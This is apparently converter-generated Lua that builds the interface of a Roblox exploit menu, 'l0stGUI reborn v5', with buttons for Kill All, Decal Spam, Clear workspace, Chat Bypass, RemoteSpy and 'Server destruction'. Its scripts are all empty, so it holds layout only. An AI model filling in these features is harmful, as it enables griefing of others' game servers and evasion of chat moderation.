--[=[
 d888b  db    db d888888b      .d888b.      db      db    db  .d8b.  
88' Y8b 88    88   `88'        VP  `8D      88      88    88 d8' `8b 
88      88    88    88            odD'      88      88    88 88ooo88 
88  ooo 88    88    88          .88'        88      88    88 88~~~88 
88. ~8~ 88b  d88   .88.        j88.         88booo. 88b  d88 88   88    @uniquadev
 Y888P  ~Y8888P' Y888888P      888888D      Y88888P ~Y8888P' YP   YP  CONVERTER 
]=]

-- Instances: 62 | Scripts: 24 | Modules: 0 | Tags: 0
local G2L = {};

-- StarterGui.ScreenGui
G2L["1"] = Instance.new("ScreenGui", game:GetService("Players").LocalPlayer:WaitForChild("PlayerGui"));
G2L["1"]["ZIndexBehavior"] = Enum.ZIndexBehavior.Sibling;


-- StarterGui.ScreenGui.MainFrame
G2L["2"] = Instance.new("Frame", G2L["1"]);
G2L["2"]["BorderSizePixel"] = 0;
G2L["2"]["BackgroundColor3"] = Color3.fromRGB(0, 0, 128);
G2L["2"]["Size"] = UDim2.new(0, 282, 0, 340);
G2L["2"]["Position"] = UDim2.new(0, 0, 0.26005, 0);
G2L["2"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["2"]["Name"] = [[MainFrame]];


-- StarterGui.ScreenGui.MainFrame.Frame
G2L["3"] = Instance.new("Frame", G2L["2"]);
G2L["3"]["BorderSizePixel"] = 0;
G2L["3"]["BackgroundColor3"] = Color3.fromRGB(0, 0, 255);
G2L["3"]["Size"] = UDim2.new(0, 551, 0, 26);
G2L["3"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);


-- StarterGui.ScreenGui.MainFrame.Frame.TextLabel
G2L["4"] = Instance.new("TextLabel", G2L["3"]);
G2L["4"]["TextWrapped"] = true;
G2L["4"]["BorderSizePixel"] = 0;
G2L["4"]["TextSize"] = 14;
G2L["4"]["TextScaled"] = true;
G2L["4"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
G2L["4"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["4"]["TextColor3"] = Color3.fromRGB(0, 0, 0);
G2L["4"]["BackgroundTransparency"] = 1;
G2L["4"]["Size"] = UDim2.new(0, 282, 0, 25);
G2L["4"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["4"]["Text"] = [[l0stGUI reborn v5 by l0stk1dd88]];


-- StarterGui.ScreenGui.MainFrame.Frame.TextLabel
G2L["5"] = Instance.new("TextLabel", G2L["3"]);
G2L["5"]["TextWrapped"] = true;
G2L["5"]["BorderSizePixel"] = 0;
G2L["5"]["TextSize"] = 14;
G2L["5"]["TextScaled"] = true;
G2L["5"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
G2L["5"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["5"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["5"]["BackgroundTransparency"] = 1;
G2L["5"]["Size"] = UDim2.new(0, 137, 0, 25);
G2L["5"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["5"]["Text"] = [[Server destruction]];
G2L["5"]["Position"] = UDim2.new(0, 0, 1, 0);


-- StarterGui.ScreenGui.MainFrame.Frame.TextLabel
G2L["6"] = Instance.new("TextLabel", G2L["3"]);
G2L["6"]["TextWrapped"] = true;
G2L["6"]["BorderSizePixel"] = 0;
G2L["6"]["TextSize"] = 14;
G2L["6"]["TextScaled"] = true;
G2L["6"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
G2L["6"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["6"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["6"]["BackgroundTransparency"] = 1;
G2L["6"]["Size"] = UDim2.new(0, 129, 0, 25);
G2L["6"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["6"]["Text"] = [[Scripts]];
G2L["6"]["Position"] = UDim2.new(0.51418, 0, 0.96154, 0);


-- StarterGui.ScreenGui.MainFrame.Frame.TextLabel
G2L["7"] = Instance.new("TextLabel", G2L["3"]);
G2L["7"]["TextWrapped"] = true;
G2L["7"]["BorderSizePixel"] = 0;
G2L["7"]["TextSize"] = 14;
G2L["7"]["TextScaled"] = true;
G2L["7"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
G2L["7"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["7"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["7"]["BackgroundTransparency"] = 1;
G2L["7"]["Size"] = UDim2.new(0, 120, 0, 25);
G2L["7"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["7"]["Text"] = [[Scripts]];
G2L["7"]["Position"] = UDim2.new(0.27768, 0, 1.07692, 0);


-- StarterGui.ScreenGui.MainFrame.Frame
G2L["8"] = Instance.new("Frame", G2L["2"]);
G2L["8"]["BorderSizePixel"] = 0;
G2L["8"]["BackgroundColor3"] = Color3.fromRGB(0, 86, 255);
G2L["8"]["Size"] = UDim2.new(0, 8, 0, 313);
G2L["8"]["Position"] = UDim2.new(0.48582, 0, 0.07602, 0);
G2L["8"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);


-- StarterGui.ScreenGui.MainFrame.Page1
G2L["9"] = Instance.new("TextButton", G2L["2"]);
G2L["9"]["TextWrapped"] = true;
G2L["9"]["BorderSizePixel"] = 0;
G2L["9"]["TextSize"] = 14;
G2L["9"]["TextScaled"] = true;
G2L["9"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["9"]["BackgroundColor3"] = Color3.fromRGB(0, 0, 0);
G2L["9"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["9"]["Size"] = UDim2.new(0, 121, 0, 32);
G2L["9"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["9"]["Text"] = [[Kill All]];
G2L["9"]["Name"] = [[Page1]];
G2L["9"]["Position"] = UDim2.new(0.02482, 0, 0.15824, 0);


-- StarterGui.ScreenGui.MainFrame.Page1.LocalScript
G2L["a"] = Instance.new("LocalScript", G2L["9"]);



-- StarterGui.ScreenGui.MainFrame.Page1
G2L["b"] = Instance.new("TextButton", G2L["2"]);
G2L["b"]["TextWrapped"] = true;
G2L["b"]["BorderSizePixel"] = 0;
G2L["b"]["TextSize"] = 14;
G2L["b"]["TextScaled"] = true;
G2L["b"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["b"]["BackgroundColor3"] = Color3.fromRGB(0, 0, 0);
G2L["b"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["b"]["Size"] = UDim2.new(0, 121, 0, 32);
G2L["b"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["b"]["Text"] = [[Set Skybox]];
G2L["b"]["Name"] = [[Page1]];
G2L["b"]["Position"] = UDim2.new(0.02482, 0, 0.2752, 0);


-- StarterGui.ScreenGui.MainFrame.Page1.LocalScript
G2L["c"] = Instance.new("LocalScript", G2L["b"]);



-- StarterGui.ScreenGui.MainFrame.Page1
G2L["d"] = Instance.new("TextButton", G2L["2"]);
G2L["d"]["TextWrapped"] = true;
G2L["d"]["BorderSizePixel"] = 0;
G2L["d"]["TextSize"] = 14;
G2L["d"]["TextScaled"] = true;
G2L["d"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["d"]["BackgroundColor3"] = Color3.fromRGB(0, 0, 0);
G2L["d"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["d"]["Size"] = UDim2.new(0, 121, 0, 32);
G2L["d"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["d"]["Text"] = [[Decal Spam]];
G2L["d"]["Name"] = [[Page1]];
G2L["d"]["Position"] = UDim2.new(0.02482, 0, 0.38923, 0);


-- StarterGui.ScreenGui.MainFrame.Page1.LocalScript
G2L["e"] = Instance.new("LocalScript", G2L["d"]);



-- StarterGui.ScreenGui.MainFrame.Page1
G2L["f"] = Instance.new("TextButton", G2L["2"]);
G2L["f"]["TextWrapped"] = true;
G2L["f"]["BorderSizePixel"] = 0;
G2L["f"]["TextSize"] = 14;
G2L["f"]["TextScaled"] = true;
G2L["f"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["f"]["BackgroundColor3"] = Color3.fromRGB(0, 0, 0);
G2L["f"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["f"]["Size"] = UDim2.new(0, 121, 0, 32);
G2L["f"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["f"]["Text"] = [[Unanchor all]];
G2L["f"]["Name"] = [[Page1]];
G2L["f"]["Position"] = UDim2.new(0.02482, 0, 0.51204, 0);


-- StarterGui.ScreenGui.MainFrame.Page1.LocalScript
G2L["10"] = Instance.new("LocalScript", G2L["f"]);



-- StarterGui.ScreenGui.MainFrame.Page1
G2L["11"] = Instance.new("TextButton", G2L["2"]);
G2L["11"]["TextWrapped"] = true;
G2L["11"]["BorderSizePixel"] = 0;
G2L["11"]["TextSize"] = 14;
G2L["11"]["TextScaled"] = true;
G2L["11"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["11"]["BackgroundColor3"] = Color3.fromRGB(0, 0, 0);
G2L["11"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["11"]["Size"] = UDim2.new(0, 121, 0, 32);
G2L["11"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["11"]["Text"] = [[Flood(broken)]];
G2L["11"]["Name"] = [[Page1]];
G2L["11"]["Position"] = UDim2.new(0.02482, 0, 0.63192, 0);


-- StarterGui.ScreenGui.MainFrame.Page1.LocalScript
G2L["12"] = Instance.new("LocalScript", G2L["11"]);



-- StarterGui.ScreenGui.MainFrame.Page1
G2L["13"] = Instance.new("TextButton", G2L["2"]);
G2L["13"]["TextWrapped"] = true;
G2L["13"]["BorderSizePixel"] = 0;
G2L["13"]["TextSize"] = 14;
G2L["13"]["TextScaled"] = true;
G2L["13"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["13"]["BackgroundColor3"] = Color3.fromRGB(0, 0, 0);
G2L["13"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["13"]["Size"] = UDim2.new(0, 121, 0, 32);
G2L["13"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["13"]["Text"] = [[Play Music]];
G2L["13"]["Name"] = [[Page1]];
G2L["13"]["Position"] = UDim2.new(0.02482, 0, 0.75181, 0);


-- StarterGui.ScreenGui.MainFrame.Page1.LocalScript
G2L["14"] = Instance.new("LocalScript", G2L["13"]);



-- StarterGui.ScreenGui.MainFrame.Page1
G2L["15"] = Instance.new("TextButton", G2L["2"]);
G2L["15"]["TextWrapped"] = true;
G2L["15"]["BorderSizePixel"] = 0;
G2L["15"]["TextSize"] = 14;
G2L["15"]["TextScaled"] = true;
G2L["15"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["15"]["BackgroundColor3"] = Color3.fromRGB(0, 0, 0);
G2L["15"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["15"]["Size"] = UDim2.new(0, 121, 0, 32);
G2L["15"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["15"]["Text"] = [[Clear workspace]];
G2L["15"]["Name"] = [[Page1]];
G2L["15"]["Position"] = UDim2.new(0.02482, 0, 0.86877, 0);


-- StarterGui.ScreenGui.MainFrame.Page1.LocalScript
G2L["16"] = Instance.new("LocalScript", G2L["15"]);



-- StarterGui.ScreenGui.MainFrame.Page2
G2L["17"] = Instance.new("TextButton", G2L["2"]);
G2L["17"]["TextWrapped"] = true;
G2L["17"]["BorderSizePixel"] = 0;
G2L["17"]["TextSize"] = 14;
G2L["17"]["TextScaled"] = true;
G2L["17"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["17"]["BackgroundColor3"] = Color3.fromRGB(0, 0, 0);
G2L["17"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["17"]["Size"] = UDim2.new(0, 121, 0, 32);
G2L["17"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["17"]["Text"] = [[LK SS]];
G2L["17"]["Name"] = [[Page2]];
G2L["17"]["Position"] = UDim2.new(0.53901, 0, 0.15824, 0);


-- StarterGui.ScreenGui.MainFrame.Page2.LocalScript
G2L["18"] = Instance.new("LocalScript", G2L["17"]);



-- StarterGui.ScreenGui.MainFrame.Page2
G2L["19"] = Instance.new("TextButton", G2L["2"]);
G2L["19"]["TextWrapped"] = true;
G2L["19"]["BorderSizePixel"] = 0;
G2L["19"]["TextSize"] = 14;
G2L["19"]["TextScaled"] = true;
G2L["19"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["19"]["BackgroundColor3"] = Color3.fromRGB(0, 0, 0);
G2L["19"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["19"]["Size"] = UDim2.new(0, 121, 0, 32);
G2L["19"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["19"]["Text"] = [[Infinite Yield FE]];
G2L["19"]["Name"] = [[Page2]];
G2L["19"]["Position"] = UDim2.new(0.53901, 0, 0.2752, 0);


-- StarterGui.ScreenGui.MainFrame.Page2.LocalScript
G2L["1a"] = Instance.new("LocalScript", G2L["19"]);



-- StarterGui.ScreenGui.MainFrame.Page2
G2L["1b"] = Instance.new("TextButton", G2L["2"]);
G2L["1b"]["TextWrapped"] = true;
G2L["1b"]["BorderSizePixel"] = 0;
G2L["1b"]["TextSize"] = 14;
G2L["1b"]["TextScaled"] = true;
G2L["1b"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["1b"]["BackgroundColor3"] = Color3.fromRGB(0, 0, 0);
G2L["1b"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["1b"]["Size"] = UDim2.new(0, 121, 0, 32);
G2L["1b"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["1b"]["Text"] = [[Fling GUI]];
G2L["1b"]["Name"] = [[Page2]];
G2L["1b"]["Position"] = UDim2.new(0.53901, 0, 0.38923, 0);


-- StarterGui.ScreenGui.MainFrame.Page2.LocalScript
G2L["1c"] = Instance.new("LocalScript", G2L["1b"]);



-- StarterGui.ScreenGui.MainFrame.Page2
G2L["1d"] = Instance.new("TextButton", G2L["2"]);
G2L["1d"]["TextWrapped"] = true;
G2L["1d"]["BorderSizePixel"] = 0;
G2L["1d"]["TextSize"] = 14;
G2L["1d"]["TextScaled"] = true;
G2L["1d"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["1d"]["BackgroundColor3"] = Color3.fromRGB(0, 0, 0);
G2L["1d"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["1d"]["Size"] = UDim2.new(0, 121, 0, 32);
G2L["1d"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["1d"]["Text"] = [[RemoteSpy]];
G2L["1d"]["Name"] = [[Page2]];
G2L["1d"]["Position"] = UDim2.new(0.53901, 0, 0.51204, 0);


-- StarterGui.ScreenGui.MainFrame.Page2.LocalScript
G2L["1e"] = Instance.new("LocalScript", G2L["1d"]);



-- StarterGui.ScreenGui.MainFrame.Page2
G2L["1f"] = Instance.new("TextButton", G2L["2"]);
G2L["1f"]["TextWrapped"] = true;
G2L["1f"]["BorderSizePixel"] = 0;
G2L["1f"]["TextSize"] = 14;
G2L["1f"]["TextScaled"] = true;
G2L["1f"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["1f"]["BackgroundColor3"] = Color3.fromRGB(0, 0, 0);
G2L["1f"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["1f"]["Size"] = UDim2.new(0, 121, 0, 32);
G2L["1f"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["1f"]["Text"] = [[LALOL Hub]];
G2L["1f"]["Name"] = [[Page2]];
G2L["1f"]["Position"] = UDim2.new(0.53901, 0, 0.63192, 0);


-- StarterGui.ScreenGui.MainFrame.Page2.LocalScript
G2L["20"] = Instance.new("LocalScript", G2L["1f"]);



-- StarterGui.ScreenGui.MainFrame.Page2
G2L["21"] = Instance.new("TextButton", G2L["2"]);
G2L["21"]["TextWrapped"] = true;
G2L["21"]["BorderSizePixel"] = 0;
G2L["21"]["TextSize"] = 14;
G2L["21"]["TextScaled"] = true;
G2L["21"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["21"]["BackgroundColor3"] = Color3.fromRGB(0, 0, 0);
G2L["21"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["21"]["Size"] = UDim2.new(0, 121, 0, 32);
G2L["21"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["21"]["Text"] = [[Chat Bypass]];
G2L["21"]["Name"] = [[Page2]];
G2L["21"]["Position"] = UDim2.new(0.53901, 0, 0.75181, 0);


-- StarterGui.ScreenGui.MainFrame.Page2.LocalScript
G2L["22"] = Instance.new("LocalScript", G2L["21"]);



-- StarterGui.ScreenGui.MainFrame.Page2
G2L["23"] = Instance.new("TextButton", G2L["2"]);
G2L["23"]["TextWrapped"] = true;
G2L["23"]["BorderSizePixel"] = 0;
G2L["23"]["TextSize"] = 14;
G2L["23"]["TextScaled"] = true;
G2L["23"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["23"]["BackgroundColor3"] = Color3.fromRGB(0, 0, 0);
G2L["23"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["23"]["Size"] = UDim2.new(0, 121, 0, 32);
G2L["23"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["23"]["Text"] = [[Empty]];
G2L["23"]["Name"] = [[Page2]];
G2L["23"]["Position"] = UDim2.new(0.53901, 0, 0.86877, 0);


-- StarterGui.ScreenGui.MainFrame.Frame
G2L["24"] = Instance.new("Frame", G2L["2"]);
G2L["24"]["BorderSizePixel"] = 0;
G2L["24"]["BackgroundColor3"] = Color3.fromRGB(0, 0, 128);
G2L["24"]["Size"] = UDim2.new(0, 269, 0, 314);
G2L["24"]["Position"] = UDim2.new(1, 0, 0.07647, 0);
G2L["24"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);


-- StarterGui.ScreenGui.MainFrame.Frame.SpeedInput
G2L["25"] = Instance.new("TextBox", G2L["24"]);
G2L["25"]["CursorPosition"] = -1;
G2L["25"]["Name"] = [[SpeedInput]];
G2L["25"]["PlaceholderColor3"] = Color3.fromRGB(255, 255, 255);
G2L["25"]["BorderSizePixel"] = 0;
G2L["25"]["TextWrapped"] = true;
G2L["25"]["TextSize"] = 14;
G2L["25"]["TextColor3"] = Color3.fromRGB(0, 0, 0);
G2L["25"]["TextScaled"] = true;
G2L["25"]["BackgroundColor3"] = Color3.fromRGB(0, 0, 255);
G2L["25"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["25"]["PlaceholderText"] = [[Put walkspeed here]];
G2L["25"]["Size"] = UDim2.new(0, 138, 0, 43);
G2L["25"]["Position"] = UDim2.new(0.45725, 0, 0.02875, 0);
G2L["25"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["25"]["Text"] = [[]];


-- StarterGui.ScreenGui.MainFrame.Frame.SpeedInput.LocalScript
G2L["26"] = Instance.new("LocalScript", G2L["25"]);



-- StarterGui.ScreenGui.MainFrame.Frame.SpeedExecute
G2L["27"] = Instance.new("TextButton", G2L["24"]);
G2L["27"]["TextWrapped"] = true;
G2L["27"]["BorderSizePixel"] = 0;
G2L["27"]["TextSize"] = 14;
G2L["27"]["TextScaled"] = true;
G2L["27"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["27"]["BackgroundColor3"] = Color3.fromRGB(0, 0, 174);
G2L["27"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["27"]["Size"] = UDim2.new(0, 95, 0, 43);
G2L["27"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["27"]["Text"] = [[Set walkspeed]];
G2L["27"]["Name"] = [[SpeedExecute]];
G2L["27"]["Position"] = UDim2.new(0.05576, 0, 0.02875, 0);


-- StarterGui.ScreenGui.MainFrame.Frame.SpeedExecute.LocalScript
G2L["28"] = Instance.new("LocalScript", G2L["27"]);



-- StarterGui.ScreenGui.MainFrame.Frame.JumpPowerExecute
G2L["29"] = Instance.new("TextButton", G2L["24"]);
G2L["29"]["TextWrapped"] = true;
G2L["29"]["BorderSizePixel"] = 0;
G2L["29"]["TextSize"] = 14;
G2L["29"]["TextScaled"] = true;
G2L["29"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["29"]["BackgroundColor3"] = Color3.fromRGB(0, 0, 174);
G2L["29"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["29"]["Size"] = UDim2.new(0, 95, 0, 43);
G2L["29"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["29"]["Text"] = [[Set jumppower]];
G2L["29"]["Name"] = [[JumpPowerExecute]];
G2L["29"]["Position"] = UDim2.new(0.05576, 0, 0.19808, 0);


-- StarterGui.ScreenGui.MainFrame.Frame.JumpPowerExecute.LocalScript
G2L["2a"] = Instance.new("LocalScript", G2L["29"]);



-- StarterGui.ScreenGui.MainFrame.Frame.JumpInput
G2L["2b"] = Instance.new("TextBox", G2L["24"]);
G2L["2b"]["CursorPosition"] = -1;
G2L["2b"]["Name"] = [[JumpInput]];
G2L["2b"]["PlaceholderColor3"] = Color3.fromRGB(255, 255, 255);
G2L["2b"]["BorderSizePixel"] = 0;
G2L["2b"]["TextWrapped"] = true;
G2L["2b"]["TextSize"] = 14;
G2L["2b"]["TextColor3"] = Color3.fromRGB(0, 0, 0);
G2L["2b"]["TextScaled"] = true;
G2L["2b"]["BackgroundColor3"] = Color3.fromRGB(0, 0, 255);
G2L["2b"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["2b"]["PlaceholderText"] = [[Put JumpPower in here]];
G2L["2b"]["Size"] = UDim2.new(0, 138, 0, 43);
G2L["2b"]["Position"] = UDim2.new(0.45725, 0, 0.20128, 0);
G2L["2b"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["2b"]["Text"] = [[]];


-- StarterGui.ScreenGui.MainFrame.Frame.JumpInput.LocalScript
G2L["2c"] = Instance.new("LocalScript", G2L["2b"]);



-- StarterGui.ScreenGui.MainFrame.Frame.GravityInput
G2L["2d"] = Instance.new("TextBox", G2L["24"]);
G2L["2d"]["CursorPosition"] = -1;
G2L["2d"]["Name"] = [[GravityInput]];
G2L["2d"]["PlaceholderColor3"] = Color3.fromRGB(255, 255, 255);
G2L["2d"]["BorderSizePixel"] = 0;
G2L["2d"]["TextWrapped"] = true;
G2L["2d"]["TextSize"] = 14;
G2L["2d"]["TextColor3"] = Color3.fromRGB(0, 0, 0);
G2L["2d"]["TextScaled"] = true;
G2L["2d"]["BackgroundColor3"] = Color3.fromRGB(0, 0, 255);
G2L["2d"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["2d"]["PlaceholderText"] = [[Put gravity here]];
G2L["2d"]["Size"] = UDim2.new(0, 138, 0, 43);
G2L["2d"]["Position"] = UDim2.new(0.45725, 0, 0.38978, 0);
G2L["2d"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["2d"]["Text"] = [[]];


-- StarterGui.ScreenGui.MainFrame.Frame.GravityInput.LocalScript
G2L["2e"] = Instance.new("LocalScript", G2L["2d"]);



-- StarterGui.ScreenGui.MainFrame.Frame.GravityExecute
G2L["2f"] = Instance.new("TextButton", G2L["24"]);
G2L["2f"]["TextWrapped"] = true;
G2L["2f"]["BorderSizePixel"] = 0;
G2L["2f"]["TextSize"] = 14;
G2L["2f"]["TextScaled"] = true;
G2L["2f"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["2f"]["BackgroundColor3"] = Color3.fromRGB(0, 0, 174);
G2L["2f"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["2f"]["Size"] = UDim2.new(0, 95, 0, 43);
G2L["2f"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["2f"]["Text"] = [[Set gravity]];
G2L["2f"]["Name"] = [[GravityExecute]];
G2L["2f"]["Position"] = UDim2.new(0.05576, 0, 0.38978, 0);


-- StarterGui.ScreenGui.MainFrame.Frame.GravityExecute.LocalScript
G2L["30"] = Instance.new("LocalScript", G2L["2f"]);



-- StarterGui.ScreenGui.MainFrame.Frame.GravityExecute.LocalScript
G2L["31"] = Instance.new("LocalScript", G2L["2f"]);



-- StarterGui.ScreenGui.MainFrame.Frame.MusicInput
G2L["32"] = Instance.new("TextBox", G2L["24"]);
G2L["32"]["CursorPosition"] = -1;
G2L["32"]["Name"] = [[MusicInput]];
G2L["32"]["PlaceholderColor3"] = Color3.fromRGB(255, 255, 255);
G2L["32"]["BorderSizePixel"] = 0;
G2L["32"]["TextWrapped"] = true;
G2L["32"]["TextSize"] = 14;
G2L["32"]["TextColor3"] = Color3.fromRGB(0, 0, 0);
G2L["32"]["TextScaled"] = true;
G2L["32"]["BackgroundColor3"] = Color3.fromRGB(0, 0, 255);
G2L["32"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["32"]["PlaceholderText"] = [[Put MusicID here]];
G2L["32"]["Size"] = UDim2.new(0, 138, 0, 43);
G2L["32"]["Position"] = UDim2.new(0.05576, 0, 0.5655, 0);
G2L["32"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["32"]["Text"] = [[]];


-- StarterGui.ScreenGui.MainFrame.Frame.MusicInput.LocalScript
G2L["33"] = Instance.new("LocalScript", G2L["32"]);



-- StarterGui.ScreenGui.MainFrame.Frame.MusicSpeed
G2L["34"] = Instance.new("TextBox", G2L["24"]);
G2L["34"]["CursorPosition"] = -1;
G2L["34"]["Name"] = [[MusicSpeed]];
G2L["34"]["PlaceholderColor3"] = Color3.fromRGB(255, 255, 255);
G2L["34"]["BorderSizePixel"] = 0;
G2L["34"]["TextWrapped"] = true;
G2L["34"]["TextSize"] = 14;
G2L["34"]["TextColor3"] = Color3.fromRGB(0, 0, 0);
G2L["34"]["TextScaled"] = true;
G2L["34"]["BackgroundColor3"] = Color3.fromRGB(0, 0, 255);
G2L["34"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["34"]["PlaceholderText"] = [[Put Music's speed here]];
G2L["34"]["Size"] = UDim2.new(0, 81, 0, 43);
G2L["34"]["Position"] = UDim2.new(0.62825, 0, 0.5655, 0);
G2L["34"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["34"]["Text"] = [[]];


-- StarterGui.ScreenGui.MainFrame.Frame.ExecuteMusic
G2L["35"] = Instance.new("TextButton", G2L["24"]);
G2L["35"]["TextWrapped"] = true;
G2L["35"]["BorderSizePixel"] = 0;
G2L["35"]["TextSize"] = 14;
G2L["35"]["TextScaled"] = true;
G2L["35"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["35"]["BackgroundColor3"] = Color3.fromRGB(0, 0, 174);
G2L["35"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["35"]["Size"] = UDim2.new(0, 246, 0, 32);
G2L["35"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["35"]["Text"] = [[Play Music]];
G2L["35"]["Name"] = [[ExecuteMusic]];
G2L["35"]["Position"] = UDim2.new(0.05576, 0, 0.73163, 0);


-- StarterGui.ScreenGui.MainFrame.Frame.ExecuteMusic.LocalScript
G2L["36"] = Instance.new("LocalScript", G2L["35"]);



-- StarterGui.ScreenGui.MainFrame.Frame.ExecuteMusic.LocalScript
G2L["37"] = Instance.new("LocalScript", G2L["35"]);



-- StarterGui.ScreenGui.MainFrame.Frame
G2L["38"] = Instance.new("Frame", G2L["2"]);
